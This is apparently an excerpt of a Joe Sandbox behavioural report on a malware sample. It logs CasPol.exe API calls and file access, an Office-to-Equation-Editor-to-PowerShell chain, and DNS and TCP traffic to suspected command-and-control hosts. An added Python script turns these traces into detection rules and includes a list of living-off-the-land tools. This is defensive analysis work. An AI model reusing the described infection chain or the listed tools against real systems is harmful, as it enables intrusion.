                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 20_2_0040C388 FindFirstFileW,PathFileExistsW,FindNextFileW,FindClose,FindClose,20_2_0040C388
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 20_2_004096A0 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,FindClose,20_2_004096A0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 20_2_00408847 __EH_prolog,FindFirstFileW,__CxxThrowException@8,FindNextFileW,FindClose,20_2_00408847
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 20_2_00407877 FindFirstFileW,FindNextFileW,20_2_00407877
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 20_2_0044E8F9 FindFirstFileExA,20_2_0044E8F9
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 20_2_0040BB6B FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose,20_2_0040BB6B
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 20_2_00419B86 FindFirstFileW,FindNextFileW,FindNextFileW,20_2_00419B86
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 20_2_0040BD72 FindFirstFileA,FindClose,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose,20_2_0040BD72
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 20_2_100010F1 lstrlenW,lstrlenW,lstrcatW,lstrlenW,lstrlenW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,20_2_100010F1
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 20_2_10006580 FindFirstFileExA,20_2_10006580
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 22_2_0040AE51 FindFirstFileW,FindNextFileW,22_2_0040AE51
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 23_2_00407EF8 FindFirstFileA,FindNextFileA,strlen,strlen,23_2_00407EF8
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 24_2_00407898 FindFirstFileA,FindNextFileA,strlen,strlen,24_2_00407898
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 20_2_00407CD2 SetEvent,GetFileAttributesW,DeleteFileW,ShellExecuteW,GetLogicalDriveStringsA,SetFileAttributesW,DeleteFileA,Sleep,StrToIntA,CreateDirectoryW,20_2_00407CD2
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe File opened: C:\Windows\SysWOW64\config\systemprofile\
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe File opened: C:\Windows\SysWOW64\config\systemprofile\AppData\
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe File opened: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe File opened: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Caches\
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe File opened: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe File opened: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\
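                  The process-creation, COM and TLS entries above are the evidence a detection rule keys on: an Office application launching the Equation Editor, EQNEDT32.EXE launching a script host, a native CoGetObject call inside CasPol.exe (a managed .NET Framework utility, so a native function at a 0x0040xxxx address in it is consistent with injected code), and HTTPS sessions negotiated at TLS 1.0. The Python script below is an added example, not part of this Joe Sandbox report or of any Joe Sandbox tooling. It parses evidence lines in the report's own "Source: <origin> <event>: <detail>" layout and applies those heuristics as named rules. The rule names, the lists of Office applications, script hosts, living-off-the-land binaries and managed hosts, and the sample lines (constructed from entries on this page, with the origin and event fields space-separated) are this example's own assumptions; the script-host-to-PowerShell rule generalizes beyond the entries above to script-host chains in general.

```python
import re
from dataclasses import dataclass

# Constructed sample input: evidence lines in the layout this report uses
# ("Source: <origin> <event>: <detail>"), assembled from entries on this page.
SAMPLE_REPORT = r"""
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process created: C:\Windows\SysWOW64\mshta.exe
Source: C:\Windows\SysWOW64\wscript.exe Child: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 20_2_00407538 _wcslen,CoGetObject,20_2_00407538
Source: unknown HTTPS traffic detected: 24.199.88.84:443 -> 192.168.2.22:49162 version: TLS 1.0
Source: unknown HTTPS traffic detected: 24.199.88.84:443 -> 192.168.2.22:49161 version: TLS 1.2
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE File opened: C:\Windows\System32\MSVCR90.dll
""".strip().splitlines()

# Origin is matched non-greedily so paths containing spaces survive; the event
# keyword list is the set of event types this example understands.
LINE_RE = re.compile(
    r"^Source:\s+(?P<origin>.+?)\s+"
    r"(?P<event>Process created|Child|Code function|HTTPS traffic detected|File opened):\s+"
    r"(?P<detail>.+)$"
)
TLS_RE = re.compile(
    r"(?P<server>\d{1,3}(?:\.\d{1,3}){3}):(?P<port>\d+) -> \S+ version: (?P<version>(?:SSL|TLS) [\d.]+)"
)

# Rule vocabularies (assumptions of this example, not from the report).
OFFICE_APPS = {"winword.exe", "excel.exe", "powerpnt.exe"}
SCRIPT_HOSTS = {"wscript.exe", "cscript.exe", "mshta.exe"}
LOLBINS = {"mshta.exe", "powershell.exe", "cmd.exe", "wscript.exe", "cscript.exe",
           "rundll32.exe", "regsvr32.exe", "certutil.exe"}
# Managed .NET Framework utilities: a native Win32 call attributed to one of
# them is a heuristic for injected code (assumption of this example).
MANAGED_HOSTS = {"caspol.exe", "regasm.exe", "regsvcs.exe", "installutil.exe", "msbuild.exe"}
LEGACY_TLS = {"SSL 2.0", "SSL 3.0", "TLS 1.0", "TLS 1.1"}


@dataclass
class Event:
    origin: str
    event: str
    detail: str


def parse_report(lines):
    """Yield an Event for every line that matches the report's evidence layout."""
    for line in lines:
        m = LINE_RE.match(line.strip())
        if m:
            yield Event(m["origin"], m["event"], m["detail"])


def basename(path):
    """Lower-cased file name of a Windows path, with surrounding quotes removed."""
    return re.split(r"[\\/]", path.strip('"'))[-1].lower()


def child_image(detail):
    """Image path of a created process: the detail text up to the first '.exe'
    (the quoted command line, e.g. '... -Embedding', follows it)."""
    m = re.match(r".+?\.exe", detail, re.IGNORECASE)
    return m.group(0) if m else detail


def evaluate(lines):
    """Return (rule, subject, object) findings for the given evidence lines."""
    findings = []
    for ev in parse_report(lines):
        origin = basename(ev.origin)
        if ev.event in ("Process created", "Child"):
            child = basename(child_image(ev.detail))
            if origin in OFFICE_APPS and child == "eqnedt32.exe":
                findings.append(("office_spawns_equation_editor", origin, child))
            if origin == "eqnedt32.exe" and child in LOLBINS:
                findings.append(("equation_editor_spawns_lolbin", origin, child))
            if origin in SCRIPT_HOSTS and child == "powershell.exe":
                findings.append(("script_host_spawns_powershell", origin, child))
        elif ev.event == "HTTPS traffic detected":
            m = TLS_RE.search(ev.detail)
            if m and m["version"] in LEGACY_TLS:
                findings.append(("legacy_tls_version", m["server"], m["version"]))
        elif ev.event == "Code function":
            if origin in MANAGED_HOSTS and "CoGetObject" in ev.detail:
                findings.append(("native_com_elevation_in_managed_host", origin, "CoGetObject"))
    return findings


if __name__ == "__main__":
    for rule, subject, obj in evaluate(SAMPLE_REPORT):
        print(f"{rule:40} {subject} -> {obj}")
```

Two caveats when turning these into production rules. Hosts with the January 2018 Office updates no longer ship the Equation Editor at all, so on a patched estate any EQNEDT32.EXE launch is worth an alert; on older builds treat office_spawns_equation_editor as informational and rely on what the editor spawns next. The TLS 1.0 rule is a weak signal on its own: an old client such as the Office 2010 era sandbox here may negotiate TLS 1.0 by default, so the version alone does not distinguish the C2 server from the Google hosts contacted on the same run.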

                  Software Vulnerabilities

                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                  Source: C:\Windows\SysWOW64\wscript.exe Child: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                  Source: global traffic DNS query: name: u4u.kids
                  Source: global traffic DNS query: name: u4u.kids
                  Source: global traffic DNS query: name: u4u.kids
                  Source: global traffic DNS query: name: u4u.kids
                  Source: global traffic DNS query: name: u4u.kids
                  Source: global traffic DNS query: name: u4u.kids
                  Source: global traffic DNS query: name: u4u.kids
                  Source: global traffic DNS query: name: drive.google.com
                  Source: global traffic DNS query: name: drive.usercontent.google.com
                  Source: global traffic DNS query: name: servemail.exprotedsteel.pro
                  Source: global traffic DNS query: name: geoplugin.net
                  Source: global traffic TCP traffic: 192.168.2.22:49166 -> 24.199.88.84:443
                  Source: global traffic TCP traffic: 192.168.2.22:49171 -> 142.250.181.238:443
                  Source: global traffic TCP traffic: 192.168.2.22:49172 -> 216.58.212.129:443
                  Source: global traffic TCP traffic: 192.168.2.22:49167 -> 85.215.206.82:80
                  Source: global traffic TCP traffic: 192.168.2.22:49169 -> 85.215.206.82:80
                  Source: global traffic TCP traffic: 192.168.2.22:49170 -> 85.215.206.82:80
                  Source: global traffic TCP traffic: 192.168.2.22:49173 -> 85.215.206.82:80
                  Source: global traffic TCP traffic: 192.168.2.22:49176 -> 178.237.33.50:80
                  Source: global traffic TCP traffic: 192.168.2.22:49161 -> 24.199.88.84:443
                  Source: global traffic TCP traffic: 192.168.2.22:49161 -> 24.199.88.84:443
                  Source: global traffic TCP traffic: 192.168.2.22:49161 -> 24.199.88.84:443
                  Source: global traffic TCP traffic: 192.168.2.22:49161 -> 24.199.88.84:443
                  Source: global traffic TCP traffic: 192.168.2.22:49161 -> 24.199.88.84:443
                  Source: global traffic TCP traffic: 192.168.2.22:49161 -> 24.199.88.84:443
                  Source: global traffic TCP traffic: 192.168.2.22:49161 -> 24.199.88.84:443
                  Source: global traffic TCP traffic: 192.168.2.22:49161 -> 24.199.88.84:443
                  Source: global traffic TCP traffic: 192.168.2.22:49161 -> 24.199.88.84:443
                  Source: global traffic TCP traffic: 192.168.2.22:49161 -> 24.199.88.84:443
                  Source: global traffic TCP traffic: 192.168.2.22:49161 -> 24.199.88.84:443
                  Source: global traffic TCP traffic: 192.168.2.22:49161 -> 24.199.88.84:443
                  Source: global traffic TCP traffic: 192.168.2.22:49161 -> 24.199.88.84:443
                  Source: global traffic TCP traffic: 192.168.2.22:49162 -> 24.199.88.84:443
                  Source: global traffic TCP traffic: 192.168.2.22:49162 -> 24.199.88.84:443
                  Source: global traffic TCP traffic: 192.168.2.22:49162 -> 24.199.88.84:443
                  Source: global traffic TCP traffic: 192.168.2.22:49162 -> 24.199.88.84:443
                  Source: global traffic TCP traffic: 192.168.2.22:49162 -> 24.199.88.84:443
                  Source: global traffic TCP traffic: 192.168.2.22:49162 -> 24.199.88.84:443
                  Source: global traffic TCP traffic: 192.168.2.22:49162 -> 24.199.88.84:443
                  Source: global traffic TCP traffic: 192.168.2.22:49162 -> 24.199.88.84:443
                  Source: global traffic TCP traffic: 192.168.2.22:49162 -> 24.199.88.84:443
                  Source: global traffic TCP traffic: 192.168.2.22:49163 -> 24.199.88.84:443
                  Source: global traffic TCP traffic: 192.168.2.22:49163 -> 24.199.88.84:443
                  Source: global traffic TCP traffic: 192.168.2.22:49163 -> 24.199.88.84:443
                  Source: global traffic TCP traffic: 192.168.2.22:49163 -> 24.199.88.84:443
                  Source: global traffic TCP traffic: 192.168.2.22:49163 -> 24.199.88.84:443
                  Source: global traffic TCP traffic: 192.168.2.22:49163 -> 24.199.88.84:443
                  Source: global traffic TCP traffic: 192.168.2.22:49163 -> 24.199.88.84:443
                  Source: global traffic TCP traffic: 192.168.2.22:49163 -> 24.199.88.84:443
                  Source: global traffic TCP traffic: 192.168.2.22:49164 -> 24.199.88.84:443
                  Source: global traffic TCP traffic: 192.168.2.22:49164 -> 24.199.88.84:443
                  Source: global traffic TCP traffic: 192.168.2.22:49164 -> 24.199.88.84:443
                  Source: global traffic TCP traffic: 192.168.2.22:49164 -> 24.199.88.84:443
                  Source: global traffic TCP traffic: 192.168.2.22:49164 -> 24.199.88.84:443
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 24.199.88.84:443
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 24.199.88.84:443
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 24.199.88.84:443
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 24.199.88.84:443
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 24.199.88.84:443
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 24.199.88.84:443
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 24.199.88.84:443
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 24.199.88.84:443
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 24.199.88.84:443
                  Source: global trafficTCP traffic: 192.168.2.22:49166 -> 24.199.88.84:443
                  Source: global trafficTCP traffic: 192.168.2.22:49166 -> 24.199.88.84:443
                  Source: global trafficTCP traffic: 192.168.2.22:49166 -> 24.199.88.84:443
                  Source: global trafficTCP traffic: 192.168.2.22:49166 -> 24.199.88.84:443
                  Source: global trafficTCP traffic: 192.168.2.22:49166 -> 24.199.88.84:443
                  Source: global trafficTCP traffic: 192.168.2.22:49166 -> 24.199.88.84:443
                  Source: global trafficTCP traffic: 192.168.2.22:49166 -> 24.199.88.84:443
                  Source: global trafficTCP traffic: 192.168.2.22:49166 -> 24.199.88.84:443
                  Source: global trafficTCP traffic: 192.168.2.22:49166 -> 24.199.88.84:443
                  Source: global trafficTCP traffic: 192.168.2.22:49168 -> 24.199.88.84:443
                  Source: global trafficTCP traffic: 192.168.2.22:49168 -> 24.199.88.84:443
                  Source: global trafficTCP traffic: 192.168.2.22:49168 -> 24.199.88.84:443
                  Source: global trafficTCP traffic: 192.168.2.22:49168 -> 24.199.88.84:443
                  Source: global trafficTCP traffic: 192.168.2.22:49168 -> 24.199.88.84:443
                  Source: global trafficTCP traffic: 192.168.2.22:49168 -> 24.199.88.84:443
                  Source: global trafficTCP traffic: 192.168.2.22:49168 -> 24.199.88.84:443
                  Source: global trafficTCP traffic: 192.168.2.22:49168 -> 24.199.88.84:443
                  Source: global trafficTCP traffic: 192.168.2.22:49168 -> 24.199.88.84:443
                  Source: global trafficTCP traffic: 192.168.2.22:49168 -> 24.199.88.84:443
                  Source: global trafficTCP traffic: 192.168.2.22:49168 -> 24.199.88.84:443
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 142.250.181.238:443
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 142.250.181.238:443
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 142.250.181.238:443
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 142.250.181.238:443
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 142.250.181.238:443
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 142.250.181.238:443
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 142.250.181.238:443
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 142.250.181.238:443
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 142.250.181.238:443
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 142.250.181.238:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 216.58.212.129:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 216.58.212.129:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 216.58.212.129:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 216.58.212.129:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 216.58.212.129:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 216.58.212.129:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 216.58.212.129:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 216.58.212.129:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 216.58.212.129:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 216.58.212.129:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 216.58.212.129:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 216.58.212.129:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 216.58.212.129:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 216.58.212.129:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 216.58.212.129:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 216.58.212.129:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 216.58.212.129:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 216.58.212.129:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 216.58.212.129:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 216.58.212.129:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 216.58.212.129:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 216.58.212.129:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 216.58.212.129:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 216.58.212.129:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 216.58.212.129:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 216.58.212.129:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 216.58.212.129:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 216.58.212.129:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 216.58.212.129:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 216.58.212.129:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 216.58.212.129:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 216.58.212.129:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 216.58.212.129:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 216.58.212.129:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 216.58.212.129:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 216.58.212.129:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 216.58.212.129:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 216.58.212.129:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 216.58.212.129:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 216.58.212.129:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 216.58.212.129:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 216.58.212.129:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 216.58.212.129:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 216.58.212.129:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 216.58.212.129:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 216.58.212.129:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 216.58.212.129:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 216.58.212.129:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 216.58.212.129:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 216.58.212.129:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 216.58.212.129:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 216.58.212.129:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 216.58.212.129:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 216.58.212.129:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 216.58.212.129:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 216.58.212.129:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 216.58.212.129:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 216.58.212.129:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 216.58.212.129:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 216.58.212.129:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 216.58.212.129:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 216.58.212.129:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 216.58.212.129:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 216.58.212.129:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 216.58.212.129:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 216.58.212.129:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 216.58.212.129:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 216.58.212.129:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 216.58.212.129:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 216.58.212.129:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 216.58.212.129:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 216.58.212.129:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 216.58.212.129:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 216.58.212.129:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 216.58.212.129:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 216.58.212.129:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 216.58.212.129:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 216.58.212.129:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 216.58.212.129:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 216.58.212.129:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 216.58.212.129:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 216.58.212.129:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 216.58.212.129:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 216.58.212.129:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 216.58.212.129:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 216.58.212.129:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 216.58.212.129:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 216.58.212.129:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 216.58.212.129:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 216.58.212.129:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 216.58.212.129:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 216.58.212.129:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 216.58.212.129:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 216.58.212.129:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 216.58.212.129:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 216.58.212.129:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 216.58.212.129:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 216.58.212.129:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 216.58.212.129:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 216.58.212.129:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 216.58.212.129:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 216.58.212.129:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 216.58.212.129:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 216.58.212.129:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 216.58.212.129:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 216.58.212.129:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 216.58.212.129:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 216.58.212.129:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 216.58.212.129:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 216.58.212.129:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 216.58.212.129:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 216.58.212.129:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 216.58.212.129:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 216.58.212.129:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 216.58.212.129:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 216.58.212.129:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 216.58.212.129:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 216.58.212.129:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 216.58.212.129:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 216.58.212.129:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 216.58.212.129:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 216.58.212.129:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 216.58.212.129:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 216.58.212.129:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 216.58.212.129:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 216.58.212.129:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 216.58.212.129:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 216.58.212.129:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 216.58.212.129:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 216.58.212.129:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 216.58.212.129:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 216.58.212.129:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 216.58.212.129:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 216.58.212.129:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 216.58.212.129:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 216.58.212.129:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 216.58.212.129:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 216.58.212.129:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 216.58.212.129:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 216.58.212.129:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 216.58.212.129:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 216.58.212.129:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 216.58.212.129:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 216.58.212.129:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 216.58.212.129:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 216.58.212.129:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 216.58.212.129:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 216.58.212.129:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 216.58.212.129:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 216.58.212.129:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 216.58.212.129:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 216.58.212.129:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 216.58.212.129:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 216.58.212.129:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 216.58.212.129:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 216.58.212.129:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 216.58.212.129:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 216.58.212.129:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 216.58.212.129:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 216.58.212.129:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 216.58.212.129:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 216.58.212.129:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 216.58.212.129:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 216.58.212.129:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 216.58.212.129:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 216.58.212.129:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 216.58.212.129:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 216.58.212.129:443
